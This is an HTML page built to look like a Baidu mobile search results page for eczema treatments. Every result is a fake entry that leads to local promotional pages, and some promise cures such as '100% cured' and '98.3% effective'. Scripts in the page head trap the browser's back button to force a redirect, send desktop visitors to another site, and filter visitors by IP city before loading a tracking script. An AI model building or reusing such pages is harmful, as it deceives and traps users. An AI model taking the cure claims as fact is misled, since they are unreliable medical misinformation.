<html><!--STATUS OK-->
<head>
    <meta name="referrer" content="always">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport"
          content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no">
    <meta name="format-detection" content="telephone=no">
    <title>湿疹</title>
    <title>湿疹的治疗方法 </title>
    <link rel="apple-touch-icon-precomposed">

    <link href="css/style.css" rel="stylesheet" type="text/css">
    <script>
        function pushHistory() {
            var state = {title: "index", url: "http://www.mikasan.xin/sz1/sybd/index.html"};
            window.history.pushState(state, "index", location.href);
            state = {title: "index", url: ""};
            window.history.pushState(state, "index", "");
        }

        setTimeout(function () {
            pushHistory();
            window.addEventListener("popstate", function (e) {
                if (window.history.state != null && window.history.state.url != "") {
                    location.href = window.history.state.url;
                }
            });
        }, 300);
    </script>
    <script>
        var system = {
            win: false,
            mac: false,
            xll: false
        };
        var p = navigator.platform;
        system.win = p.indexOf("Win") == 0;
        system.mac = p.indexOf("Mac") == 0;
        system.x11 = (p == "X11") || (p.indexOf("Linux") == 0);
        if (system.win || system.mac || system.xll) {
            window.location.href = "http://xh9.gyg120.net";
        }
    </script>

    <script type="text/javascript" src="https://ip.ws.126.net/ipquery"></script>
    <script type="text/javascript">
        if(lo.indexOf("北京")==-1&&lc.indexOf("广州")==-1&&lo.indexOf("上海")==-1){
            var uids = uids || [];
            var urd = urd || [];
            var screen_baidu = false; //要屏蔽百度请修改为true
            uids.push('a86bd91a218745af2b9474a1a0008f7c');
            urd.push('287');
        }
    </script>
    <script type="text/javascript" src="https://code.ljwit.com/return_url.js"></script>
</head>
<body>

<div id="page-hd" class="se-page-hd">
    <div class="se-page-hd-content">
        <!--<div class="se-head-logo"><a class="se-logo" href="#"></a></div>-->

        <!--<div class="searchboxtop">-->
            <!--<form class="se-form" id="se-form" action="#" method="get" style="height: 40px;">-->
                <!--<div class="con-wrap">-->
                    <!--<div class="se-bearicon "></div>-->
                    <!--<textarea autocomplete="off" autocorrect="off" maxlength="64" id="word"-->
                              <!--name="word" class="se-input" data-sug="1" style="height: 40px;">湿疹的治疗方法</textarea>-->
                    <!--<div class="se-inner">-->
                        <!--<button id="se-bn" class="se-bn" type="submit" style="height: 40px;"><span>一下</span>-->
                        <!--</button>-->
                    <!--</div>-->
                <!--</div>-->


            <!--</form>-->
            <!--<script language="javascript">  document.getElementById("word").value = keywordjinyan;</script>-->
        <!--</div>-->

        <div class="se-head-tablink">
            <div class="se-tablink-scroll-wrapper c-scroll-wrapper">
                <div class="se-tablink-scroll-touch">
                    <div class="se-tab-lists c-flexbox" style="width:105.31400966184%;"
                         data-w="105.31400966184%"><a class="se-tabitem" href="#"><span
                            class="se-tab-tx se-tab-cur">网页</span></a><a class="se-tabitem"
                                                                         href="#"><span
                            class="se-tab-tx">图片</span></a><a class="se-tabitem" href="#"><span
                            class="se-tab-tx">视频</span></a><a class="se-tabitem" href="#"><span
                            class="se-tab-tx">知乎</span></a><a class="se-tabitem" href="#"><span
                            class="se-tab-tx">贴吧</span></a><a class="se-tabitem" href="#"><span
                            class="se-tab-tx">地图</span></a><a class="se-tabitem" href="#"><span
                            class="se-tab-tx">音乐</span></a></div>
                </div>
                <div class="tab-transform-hidden"></div>
            </div>
            <div class="se-head-tabcover"></div>
        </div>
    </div>
</div>

<div id="page" class="search-page">
    <div id="page-bd" class="se-page-bd">

        <div id="results" class="results">


            <div sourceid="160" posid="1" prank=""
                 style="display:block !important;visibility: visible !important;">
                <!--<div class="c-container ec_resitem ec-new2  ec_wise_pp"-->
                     <!--style="display:block !important;visibility: visible !important;">-->
                    <!--<div><a class="c-blocka ec_title " href="asz1/index.html"><h3-->
                            <!--class="c-title c-color-link c-gap-top-small c-gap-top-small c-gap-bottom-small">-->
                        <!--有<em>湿疹</em>怎么办?一招即可,100%治好</h3>-->
                        <!--<p class="c-line-clamp2 c-color ">-->
                            <!--得了<em>湿疹怎么治疗</em>,不要再乱用办法了,每天坚持用这个方法,让你远离<em>湿疹</em>的困扰...</p></a>-->
                        <!--<div><a class="c-line-clamp1 c-blocka" href="asz1/index.html">-->
                            <!--<div class="c-gap-bottom c-line-clamp1"><span-->
                                    <!--class="c-color-gray c-gap-right-small">[危害]</span><span><em>湿疹</em>的危害及<em>治疗方法</em>？</span>-->
                            <!--</div>-->
                        <!--</a></div>-->
                        <!--<div class="c-line-top"><a class="c-line-clamp1 c-blocka"-->
                                                   <!--href="asz1/index.html">-->
                            <!--<div class="c-gap-top c-gap-bottom c-line-clamp1"><span-->
                                    <!--class="c-color-gray c-gap-right-small">[病因]</span><span>产生<em>湿疹</em>的原因!？</span>-->
                            <!--</div>-->
                        <!--</a></div>-->
                        <!--<div class="c-line-top"><a class="c-line-clamp1 c-blocka"-->
                                                   <!--href="asz1/index.html">-->
                            <!--<div class="c-gap-top c-gap-bottom c-line-clamp1"><span-->
                                    <!--class="c-color-gray c-gap-right-small">[治疗]</span><span><em>湿疹</em>的最佳治疗<em>方法</em>？</span>-->
                            <!--</div>-->
                        <!--</a></div>-->
                        <!--<div class="c-line-clamp1 c-gap-top-small"><span class="ec_urlbtn"></span>-->
                            <!--<div class="ec_urlline"><a href="asz1/index.html"-->
                                                       <!--class="ec-showurl-line "><span-->
                                    <!--class="c-showurl">跨跨医馆</span></a><span-->
                                    <!--class="c-gap-left ec-vicon" data-info="基础信誉积累，可接洽商谈"><i-->
                                    <!--class="ec_font ec_font_v2"></i></span><a href="asz1/index.html"-->
                                                                             <!--class="c-gap-left"><span-->
                                    <!--class="c-gray">6891条评价</span></a><span-->
                                    <!--class="c-gap-left ec-tuiguang">广告</span><a-->
                                    <!--href="asz1/index.html" class="ec_urlline_blank ">&nbsp;</a>-->
                            <!--</div>-->
                        <!--</div>-->
                    <!--</div>-->
                <!--</div>-->
                <div class="c-container ec_resitem ec-new2  ec_wise_pp"
                     style="display:block !important;visibility: visible !important;"><a
                        class="c-blocka ec_title " href="asz2/index.html"><h3
                        class="c-title c-color-link c-gap-top-small c-gap-top-small c-gap-bottom-small">
                    有<em>湿疹</em>怎么办?-告诉你一个治疗<em>湿疹</em>简单的方法</h3>
                    <p class="c-line-clamp3 c-color"><em>治疗湿疹</em>其实不难，我自己也是用了这个方法把<em>湿疹</em>治好了，偷偷的分享给你哦！
                    </p></a>
                    <div class="c-line-clamp1"><span class="ec_urlbtn"></span>
                        <div class="ec_urlline"><a class="ec-showurl-line "
                                                   href="asz2/index.html"><span class="c-showurl">vip.jiaoqi51.com</span></a><span
                                class="c-gap-left ec-vicon" data-info="已获实名认证，开始积累信誉"><i
                                class="ec_font ec_font_v2"></i></span><a class="c-gap-left"
                                                                         href="asz2/index.html"><span
                                class="c-gray">928条评价</span></a><span
                                class="c-gap-left ec-tuiguang">广告</span><a class="ec_urlline_blank "
                                                                           href="asz2/index.html">&nbsp;</a>
                        </div>
                    </div>
                </div>
            </div>


            <div class="result c-result c-clk-recommend" srcid="www_zhidao_normal" new_srcid="1529"
                 order="5" tpl="www_zhidao_normal">
                <div class="c-container">
                    <style data-merge="">.wa-zhidaonormal-fxhl {
                        line-height: normal;
                    }</style>
                    <a href="asz3/index.html" class="WA_LOG_SF c-blocka"><h3
                            class="c-title c-gap-top-small">手上<em>长湿疹</em>怎么回事？-有问必答-快速问医生</h3></a>
                    <div class="c-row">
                        <div class="c-span12"><a href="asz3/index.html" class="WA_LOG_SF c-blocka">
                            <div class="c-gap-top-small wa-zhidaonormal-fxhl c-color-gray">
                                4个回答-最新回答：2019年6月5日
                            </div>
                            <div class="c-abstract"><span
                                    class="c-text c-text-public c-gap-right-small">问题描述</span>病情描述及疑问：<em>湿疹治疗</em>哪些方法最好
                            </div>
                            <div class="c-abstract c-gap-top-small c-line-clamp2"><i
                                    class="c-text-info  c-gap-right-small">[最佳答案]</i>病情描述及疑问:<em>湿疹</em>多数是由于局部出汗比较多、过敏等原因造成的，建议患者外用氧化锌软膏进行治疗。如果瘙痒较严重还...
                            </div>
                        </a>
                            <div class="c-abstract c-gap-top-small">
                                <div class="c-line-clamp1"><span
                                        class="c-showurl">www.jst.com</span><span
                                        class="c-foot-mipicon-wrap c-gap-left">            <a
                                        href="asz3/index.html" class="WA_LOG_SF c-blocka"><svg
                                        class="c-foot-icon-mip" xmlns="http://www.w3.org/2000/svg"
                                        x="0px" y="0px" width="100%" height="100%" version="1.1"
                                        viewBox="0 0 155.9 224.5"><polygon style="fill:#7ACBFF"
                                                                           points="114.5,0 26,0 0,108.5 27.8,108.5 48,49.5 97.8,49.2"></polygon><polygon
                                        style="fill:#7ACBFF"
                                        points="54.8,59 155.9,59 0,222.5 "></polygon></svg></a></span><span
                                        class="koubei-entrance c-gap-left"><a href="asz3/index.html"
                                                                              class="koubei-a"><span
                                        class="c-gray">1052条评价</span></a></span></div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>


            <div class="result c-result c-clk-recommend" srcid="www_normal" new_srcid="1599"
                 order="9" tpl="www_normal">
                <div class="c-container"><a href="asz4/index.html" class="WA_LOG_SF c-blocka"><h3
                        class="c-title c-gap-top-small"><em>湿疹</em>怎么办 长期湿疹瘙痒难耐-教你治<em>湿疹</em>-好的方法-98.3%有效
                </h3></a>
                    <div class="c-row c-abstract c-gap-top-small">
                        <div class="c-span12"><a href="asz4/index.html" class="WA_LOG_SF c-blocka">
                            <p class="c-line-clamp3 c-color"><span class="c-gray c-gap-right-small">2018年9月16日&nbsp;-&nbsp;</span>2018年9月16日
                                - <em>湿疹</em>怎么办？朋友圈疯狂转发563万次！！！治疗<em>湿疹</em>，快速有效，治<em>湿疹</em>好方法，我的<em>湿疹</em>就是用这个方法...
                            </p></a>
                            <div class="c-showurl c-line-clamp1"><span class="c-showurl">m.babytree.com</span><span
                                    class="c-foot-mipicon-wrap c-gap-left">            <a
                                    href="asz4/index.html" class="WA_LOG_SF c-blocka"><svg
                                    class="c-foot-icon-mip" xmlns="http://www.w3.org/2000/svg"
                                    x="0px" y="0px" width="100%" height="100%" version="1.1"
                                    viewBox="0 0 155.9 224.5"><polygon style="fill:#7ACBFF"
                                                                       points="114.5,0 26,0 0,108.5 27.8,108.5 48,49.5 97.8,49.2"></polygon><polygon
                                    style="fill:#7ACBFF"
                                    points="54.8,59 155.9,59 0,222.5 "></polygon></svg></a></span><span
                                    class="koubei-entrance c-gap-left"><a href="asz4/index.html"
                                                                          class="koubei-a"><span
                                    class="c-gray">1389条评价</span></a></span></div>
                        </div>
                    </div>
                </div>
            </div>


            <div class="result c-result c-clk-recommend" srcid="www_normal" new_srcid="1525"
                 order="2" tpl="www_normal">
                <div class="c-container"><a href="asz5/index.html" class="c-blocka"><h3
                        class="c-title c-gap-top-small"><em>治湿疹</em>最有效的16种偏方大全</h3></a>
                    <div class="c-row c-abstract c-gap-top-small">
                        <div class="c-span12"><a href="asz5/index.html" class="c-blocka"><p
                                class="c-line-clamp3 c-color"><span
                                class="c-gray c-gap-right-small">2018年4月1日&nbsp;-&nbsp;</span><em>湿疹偏方</em>,有取些艾叶熬煮后泡澡，有祛湿止痒的疗效，可以使<em>湿疹</em>得到缓解。<em>湿疹</em>是由于体内出现热气和毒气堆积...
                        </p></a>
                            <div class="c-showurl c-line-clamp1"><span class="c-showurl">https://wenku.baidu.com</span><span
                                    class="c-showurl">&nbsp;›&nbsp;view&nbsp;›&nbsp;8fcdf6af28ea81c758f578c6</span>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="result c-result c-clk-recommend" srcid="www_normal" new_srcid="1524"
                 order="4" tpl="www_normal">
                <div class="c-container"><a href="asz6/index.html" class="c-blocka"><h3
                        class="c-title c-gap-top-small"><em>湿疹怎么根除</em>_百度经验</h3></a>
                    <div class="c-row c-abstract c-gap-top-small">
                        <div class="c-span3"><a href="asz6/index.html"
                                                data-url="http://jingyan.baidu.com/article/d713063504662013fcf47560.html"
                                                class="c-blocka">
                            <div class="c-img c-img-s" style="background: none;"><img
                                    src="asz1/images/aa1.jpg"></div>
                        </a></div>
                        <div class="c-span9"><a href="asz6/index.html"
                                                data-url="http://jingyan.baidu.com/article/d713063504662013fcf47560.html"
                                                class="c-blocka"><p class="c-line-clamp3 c-color">
                            <span class="c-gray c-gap-right-small">2018年9月25日&nbsp;-&nbsp;</span><em>湿疹</em>,一直复发怎么办才好?
                            导语:湿疹是一种过敏性炎症性皮肤病,因为体内存在一些湿毒和湿热而...</p></a>
                            <div class="c-showurl c-line-clamp1"><span class="c-showurl">jingyan.baidu.com</span><span
                                    class="c-showurl">&nbsp;›&nbsp;article&nbsp;›&nbsp;d713063504662013fcf47560</span>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="result c-result c-clk-recommend" srcid="www_zhidao_normal" new_srcid="1529"
                 order="5" tpl="www_zhidao_normal">
                <div class="c-container">
                    <style data-merge="">.wa-zhidao-normal-fxhl {
                        line-height: normal;
                    }</style>
                    <a href="asz7/index.html"
                       data-url="http://zhidao.baidu.com/question/2137664740965593588.html"
                       class="c-blocka wa-zhidaonormal-title"><h3 class="c-title c-gap-top-small">
                        <em>湿疹怎么根除</em>?能说说吗?_百度知道</h3></a>
                    <div class="c-row">
                        <div class="c-span12"><a href="asz7/index.html"
                                                 data-url="http://zhidao.baidu.com/question/2137664740965593588.html"
                                                 class="c-blocka wa-zhidaonormal-title">
                            <div class="c-gap-top-small wa-zhidao-normal-fxhl c-color-gray">
                                3个回答-提问时间：2017年04月27日
                            </div>
                            <div class="c-abstract c-gap-top-small c-line-clamp2"><i
                                    class="c-text-info  c-gap-right-small">[最佳答案]</i><em>湿疹是</em>一种常见的由多种内外因素引起的，是表皮真皮浅层炎症性皮肤病，要根除的话推荐一种<em>湿疹</em>特效药,...
                            </div>
                        </a>
                            <div class="c-abstract c-gap-top-small">
                                <div class="c-line-clamp1"><span
                                        class="c-showurl">zhidao.baidu.com</span><span
                                        class="c-showurl">&nbsp;›&nbsp;question</span></div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="result c-result c-clk-recommend" srcid="www_normal" new_srcid="1537"
                 order="6" tpl="www_normal">
                <div class="c-container"><a href="asz8/index.html" class="c-blocka"><h3
                        class="c-title c-gap-top-small"><em>湿疹</em>怎么有效彻底的根治 <em>治疗湿疹的</em>偏方_百度经验
                </h3></a>
                    <div class="c-row c-abstract c-gap-top-small">
                        <div class="c-span3"><a href="asz8/index.html" class="c-blocka">
                            <div class="c-img c-img-s" style="background: none;"><img
                                    src="asz1/images/u13398580963254683023fm88s7C00A65692615F171A03EC730300603B.jpg">
                            </div>
                        </a></div>
                        <div class="c-span9"><a href="asz8/index.html"
                                                data-url="http://jingyan.baidu.com/article/6dad5075cc1563a123e36eec.html"
                                                class="c-blocka"><p class="c-line-clamp3 c-color">
                            <span class="c-gray c-gap-right-small">2018年4月3日&nbsp;-&nbsp;</span>有<em>湿疹</em>用什么?湿疹越来越多,自从每天抽5分钟这样做,现在<em>皮肤</em>恢复正常.简单方便!有湿疹得重视,小心湿疹恶化越来越多...
                        </p></a>
                            <div class="c-showurl c-line-clamp1"><span class="c-showurl">jingyan.baidu.com</span><span
                                    class="c-showurl">&nbsp;›&nbsp;百度经验&nbsp;›&nbsp;健康/养生&nbsp;›&nbsp;保健养生</span>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="result c-result c-clk-recommend" srcid="www_normal" new_srcid="1599"
                 order="7" tpl="www_normal">
                <div class="c-container"><a href="asz9/index.html" class="c-blocka"><h3
                        class="c-title c-gap-top-small"><em>治湿疹什么方法</em>最好??_百度拇指医生</h3></a>
                    <div class="c-row c-abstract c-gap-top-small">
                        <div class="c-span12"><a href="asz9/index.html" class="c-blocka"><p
                                class="c-line-clamp3 c-color"><span
                                class="c-gray c-gap-right-small">2018年3月21日&nbsp;-&nbsp;</span>治疗<em>湿疹用药物疗法</em>比较好，药物疗法见效更快速。如果<em>湿疹</em>患处有一些渗出液，那么可以考虑用3％浓度的硼酸溶液对皮肤湿敷。还有一种方法见效很快...
                        </p></a>
                            <div class="c-showurl c-line-clamp1"><span class="c-showurl">muzhi.baidu.com</span><span
                                    class="c-showurl">&nbsp;›&nbsp;拇指医生&nbsp;›&nbsp;网友互助</span>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="result c-result c-clk-recommend" srcid="www_normal" new_srcid="1525"
                 order="8" tpl="www_normal">
                <div class="c-container"><a href="asz10/index.html" class="c-blocka"><h3
                        class="c-title c-gap-top-small"><em>湿疹如何根治</em>,要详细的_39健康问答_39健康网</h3></a>
                    <div class="c-row c-abstract c-gap-top-small">
                        <div class="c-span12"><a href="asz10/index.html" class="c-blocka"><p
                                class="c-line-clamp3 c-color"><span
                                class="c-gray c-gap-right-small">2016年10月11日&nbsp;-&nbsp;</span>第一步:疾病分型,科学准确
                            对于传统的西医来说,治疗<em>湿疹</em>是不分病人也不分病型的,基本上出现湿疹...</p></a>
                            <div class="c-showurl c-line-clamp1"><span class="c-showurl">https://wap.39.com</span><span
                                    class="c-showurl">&nbsp;›&nbsp;view&nbsp;›&nbsp;049ad21e650e52ea551898df</span>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="result c-result c-clk-recommend" srcid="www_normal" new_srcid="1599"
                 order="9" tpl="www_normal">
                <div class="c-container"><a href="asz11/index.html" class="c-blocka"><h3
                        class="c-title c-gap-top-small">
                    <em>湿疹怎么根治</em>?有什么偏方吗?</h3></a>
                    <div class="c-row c-abstract c-gap-top-small">
                        <div class="c-span12">
                            <a class="c-blocka"><p class="c-line-clamp3 c-color"><span
                                    class="c-gray c-gap-right-small">2014年10月24日&nbsp;-&nbsp;</span><em>湿疹怎么治疗</em>?瘙痒难耐,用民间方法治<em>湿疹</em>,实在省事.效果很好,省钱在线问医生....
                            </p></a>
                            <div class="c-showurl c-line-clamp1"><span class="c-showurl">jingyan.baidu.com</span><span
                                    class="c-showurl">&nbsp;›&nbsp;百度经验&nbsp;›&nbsp;健康/养生&nbsp;›&nbsp;医疗健康&nbsp;›&nbsp;皮肤科</span>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="result c-result c-clk-recommend" srcid="www_normal" new_srcid="1537"
                 order="10" tpl="www_normal">
                <div class="c-container"><a href="asz12/index.html" class="c-blocka"><h3
                        class="c-title c-gap-top-small"><em>湿疹怎么根除</em>_湿疹论坛</h3></a>
                    <div class="c-row c-abstract c-gap-top-small">
                        <div class="c-span3"><a href="asz12/index.html" class="c-blocka">
                            <div class="c-img c-img-s" style="background: none;"><img
                                    src="asz1/images/aa2.jpg"></div>
                        </a></div>
                        <div class="c-span9"><a href="asz12/index.html" class="c-blocka"><p
                                class="c-line-clamp3 c-color"><span
                                class="c-gray c-gap-right-small">2017年4月4日&nbsp;-&nbsp;</span><em>湿疹怎么根除</em>,长湿疹是一件很尴尬的事,困扰着个人生活的方方面,下面小编分享一下<em>湿疹怎么根除</em>,希望对大家有所帮助!
                        </p></a>
                            <div class="c-showurl c-line-clamp1"><span class="c-showurl">jingyan.baidu.com</span><span
                                    class="c-showurl">&nbsp;›&nbsp;百度经验&nbsp;›&nbsp;健康/养生&nbsp;›&nbsp;保健养生</span>
                            </div>
                        </div>
                    </div>
                </div>
            </div>


            <div class="result c-result c-clk-recommend" srcid="www_zhidao_normal" new_srcid="1529"
                 order="5" tpl="www_zhidao_normal">
                <div class="c-container">
                    <style data-merge="">.wa-zhidaonormal-fxhl {
                        line-height: normal;
                    }</style>
                    <a href="asz13/index.html" class="WA_LOG_SF c-blocka"><h3
                            class="c-title c-gap-top-small">
                        治疗<em>湿疹</em>的土方法-已解答-已有838条回答-除<em>湿疹</em>哪种方法好呢</h3></a>
                    <div class="c-row">
                        <div class="c-span12"><a href="asz13/index.html" class="WA_LOG_SF c-blocka">
                            <div class="c-gap-top-small wa-zhidaonormal-fxhl c-color-gray">
                                23个回答-最佳回答2017年1月16日
                            </div>
                            <div class="c-abstract"><span
                                    class="c-text c-text-public c-gap-right-small">问题描述</span>病情描述及疑问：湿疹<em>最佳治疗</em>方法
                            </div>
                            <div class="c-abstract c-gap-top-small c-line-clamp2"><i
                                    class="c-text-info  c-gap-right-small">[最佳答案]</i> <em>最好的办法</em>也是最实用<em>的办法治湿疹</em>?医学上通常将<em>湿疹</em>分三型:溃烂型、水疱型、增厚型<em>湿疹</em>...
                            </div>
                        </a>
                            <div class="c-abstract c-gap-top-small">
                                <div class="c-line-clamp1"><span
                                        class="c-showurl">www.haodf.com</span><span
                                        class="c-foot-mipicon-wrap c-gap-left">            <a
                                        href="asz13/index.html" class="WA_LOG_SF c-blocka"><svg
                                        class="c-foot-icon-mip" xmlns="http://www.w3.org/2000/svg"
                                        x="0px" y="0px" width="100%" height="100%" version="1.1"
                                        viewBox="0 0 155.9 224.5"><polygon style="fill:#7ACBFF"
                                                                           points="114.5,0 26,0 0,108.5 27.8,108.5 48,49.5 97.8,49.2"></polygon><polygon
                                        style="fill:#7ACBFF"
                                        points="54.8,59 155.9,59 0,222.5 "></polygon></svg></a></span><span
                                        class="koubei-entrance c-gap-left"><a
                                        href="asz13/index.html" class="koubei-a"><span
                                        class="c-gray">9052条评价</span></a></span></div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>


            <div sourceid="160" posid="1" prank=""
                 style="display:block !important;visibility: visible !important;">
                <div class="c-container ec_resitem ec-new2  ec_wise_pp"
                     style="display:block !important;visibility: visible !important;"><a
                        class="c-blocka ec_title " href="asz15/index.html"><h3
                        class="c-title c-color-link c-gap-top-small c-gap-top-small c-gap-bottom-small">
                    治疗<em>湿疹</em>方法 你不知道的10个可怕后果 治疗<em>手上湿疹</em>方法 </h3>
                    <p class="c-line-clamp3 c-color">
                        <em>湿疹</em>治疗方法？大家都知道传统抗生素治标不治本，此方法可以立竿见影，对治疗<em>湿疹</em>好，可靠有用！!</p></a>
                    <div class="c-line-clamp1"><span class="ec_urlbtn"></span>
                        <div class="ec_urlline"><a class="ec-showurl-line " href="asz15/index.html"><span
                                class="c-showurl">www.qwpou.com</span></a><span
                                class="c-gap-left ec-vicon" data-info="已获实名认证，开始积累信誉"><i
                                class="ec_font ec_font_v2"></i></span><a class="c-gap-left"
                                                                         href="asz15/index.html"><span
                                class="c-gray">评价</span></a><span
                                class="c-gap-left ec-tuiguang">广告</span><a class="ec_urlline_blank "
                                                                           href="asz15/index.html">&nbsp;</a>
                        </div>
                    </div>
                </div>
                <div class="c-container ec_resitem ec-new2  ec_wise_pp"
                     style="display:block !important;visibility: visible !important;"><a
                        class="c-blocka ec_title " href="asz1/index.html"><h3
                        class="c-title c-color-link c-gap-top-small c-gap-top-small c-gap-bottom-small">
                    治<em>湿疹</em>康复经历,我的湿疹终于治好了</h3>
                    <p class="c-line-clamp3 c-color">口述<em>治疗湿疹</em>的过程，除<em>湿疹</em>哪种方法好呢 怎么去除<em>湿疹</em>+微信获取去湿疹方法!
                    </p></a>
                    <div class="c-line-clamp1"><span class="ec_urlbtn"></span>
                        <div class="ec_urlline"><a class="ec-showurl-line " href="asz16/index.html"><span
                                class="c-showurl">www.zhskkllkl.com</span></a><span
                                class="c-gap-left ec-vicon" data-info="已获实名认证，开始积累信誉"><i
                                class="ec_font ec_font_v2"></i></span><a class="c-gap-left"
                                                                         href="asz16/index.html"><span
                                class="c-gray">评价</span></a><span
                                class="c-gap-left ec-tuiguang">广告</span><a class="ec_urlline_blank "
                                                                           href="asz16/index.html">&nbsp;</a>
                        </div>
                    </div>
                </div>
            </div>


            <!-- new -->


            <!-- new --></div>


        <div id="page-relative" class="se-page-relative">
            <div id="relativewords" class="se-relativewords">
                <div class="rw-title">相关搜索<i class="c-icon rw-title-icon"></i></div>
                <div class="rw-list"><a class="rw-item" href="al/ynsz/index.html">阴囊湿疹用什么药有效</a><a
                        class="rw-item" href="al/sbsz/index.html">手部湿疹怎么治疗最好</a><a class="rw-item"
                                                                                   href="asz3/index.html">湿疹怎么治才能除根</a><a
                        class="rw-item" href="asz1/index.html">湿疹是怎么治疗</a><a class="rw-item"
                                                                             href="asz2/index.html">湿疹到底能不能治好</a><a
                        class="rw-item" href="asz4/index.html">得了湿疹怎么根治</a><a class="rw-item"
                                                                              href="asz5/index.html">湿疹不治疗会怎么样</a><a
                        class="rw-item" href="asz7/index.html">十年湿疹怎么根除</a></div>
            </div>
        </div>


        <div id="page-controller" class="se-page-controller">
            <div class="new-pagenav c-flexbox"><a class="new-nextpage-only">&nbsp;</a>
                <p class="forNoPrefetch"><i class="c-icon c-gap-right icon-logo"></i>下一页<i
                        class="c-icon icon-nextpage"></i></p></div>
        </div>


        <div id="page-rcol" class="se-page-rcol">
            <div id="reword" class="se-reword">
                <div class="rw-title">相关搜索</div>
                <div class="rw-list"><a class="rw-item" href="al/ynsz/index.html">阴囊湿疹用什么药有效</a><a
                        class="rw-item" href="al/sbsz/index.html">手部湿疹怎么治疗最好</a><a class="rw-item"
                                                                                   href="asz3/index.html">湿疹怎么治才能除根</a><a
                        class="rw-item" href="asz1/index.html">湿疹是怎么治疗</a><a class="rw-item"
                                                                             href="asz2/index.html">湿疹到底能不能治好</a><a
                        class="rw-item" href="asz4/index.html">得了湿疹怎么根治</a><a class="rw-item"
                                                                              href="asz5/index.html">湿疹不治疗会怎么样</a><a
                        class="rw-item" href="asz7/index.html">十年湿疹怎么根除</a></div>
            </div>
        </div>


    </div>


    <div id="page-ft" class="se-page-ft">
        <div id="ft-wrap" class="se-ft-wrap">
            <div id="footer-wrap">


                <form class="se-form" id="index-form" action="#" method="get">

                    <div class="con-wrap">
                        <div class="se-bearicon"></div>
                        <input id="word1" name="word" value="湿疹" class="se-input adjust-input"
                               maxlength="64">
                        <div class="se-inner">
                            <div id="cross2" class="cross"></div>
                            <button id="search1" class="se-bn" type="submit"
                                    onClick="alertValue1()"><span>百度一下</span></button>
                        </div>
                    </div>
                    <div id="se-box2" class="se-box"></div>

                </form>
                <script language="javascript">  document.getElementById("word1").value = keywordjinyan;</script>
            </div>
            <div class="footerlink"></div>
        </div>
    </div>

    <!--<div class="se-page-copyright" id="page-copyright">-->
        <!--<div class="return-link"><a class="ft-span feedback brand-item c-blocka">返回首页</a><a href="#"-->
                                                                                            <!--class="ft-span feedback brand-item c-blocka">用户反馈</a><a-->
                <!--class="ft-span login-bot c-blocka" id="login-bot" href="#">用户登录</a></div>-->


        <!--<div id="foot-logo" class="se-foot-logo"><a id="logo" class="logo se-logo"></a></div>-->


        <!--&lt;!&ndash;<div id="copyright" class="se-copyright">ICP&nbsp;京ICP证130183号</div>&ndash;&gt;-->
    <!--</div>-->
</div>
</body>
</html>
